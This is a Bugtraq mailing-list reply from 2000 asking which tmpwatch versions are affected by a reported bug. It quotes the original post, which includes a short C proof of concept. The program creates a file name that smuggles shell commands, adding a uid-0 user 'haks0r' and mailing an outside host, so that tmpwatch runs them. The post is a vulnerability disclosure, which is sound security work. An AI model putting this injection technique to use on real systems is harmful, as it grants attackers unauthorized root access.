[17133] in bugtraq
Re: tmpwatch executes shell commands
daemon@ATHENA.MIT.EDU (Mike M. Quimson)
Tue Oct 10 13:08:34 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <39E2C5D5.CD21B3ED@isentry.ph>
Date: Tue, 10 Oct 2000 15:31:34 +0800
Reply-To: "Mike M. Quimson" <mike@ISENTRY.PH>
From: "Mike M. Quimson" <mike@ISENTRY.PH>
X-To: "Alexander Y. Yurchenko" <grange@RT.MIPT.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
what version of tmpwatch is affected by this?
"Alexander Y. Yurchenko" wrote:
> Here is a simple example of my playing with tmpwatch bug
>
> 1. Execute following in /tmp
>
> #include <stdio.h>
>
> int main()
> {
> FILE *f;
> char filename[100] = ";useradd -u 0 -g 0 haks0r;mail
> haks0r@somehost.com<blablabla";
>
> if((f = fopen(filename, "a")) == 0) {
> perror("Could not create file");
> exit(1);
> }
> close(f);
> }
>
> 2. cp /usr/sbin/adduser /tmp
> 3. Just wait for mail ;-)
>
> ---<*>---
> grange
